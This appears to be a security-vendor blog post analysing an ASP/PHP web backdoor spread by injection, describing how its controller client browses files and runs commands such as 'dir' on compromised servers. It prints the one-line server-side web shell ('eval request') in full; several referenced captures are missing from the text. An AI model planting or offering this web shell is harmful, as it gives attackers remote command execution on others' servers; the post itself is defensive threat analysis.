Analysis of a backdoor's communication process

Websense Security Labs™ ThreatSeeker™ Network has detected a backdoor written by a Chinese hacker spreading in the wild.  In this blog we shall explore what actions are possible with such a backdoor.

The controller client of the backdoor can explore and modify all files on a compromised server:

Also, hackers can use a client to run commands on the compromised server:

With the powerful client side, the server side only needs a few code lines written in ASP or PHP, so it can easily be injected into a Web page by SQL injection or other hack technology.  The source code of the server side looks like this: 

<%eval request("hack")%>

By capturing the network traffic packages, we can see what the backdoor did. Here is an example:

The client side generates an encoded command string as a post request to the server. The string is:

After decoding this, we can see how to run a command on the compromised server:

The parameter z1 is "cmd", which opens a command line on the server side, and the parameter z2 is:

Following the request, the server response is to list all files in the current folder:

The above shows the running of a "dir" command on a compromised server. Hackers can run almost all commands on a server from the client side by using this method.

Websense Messaging and Websense Web Security customers are protected against these attacks.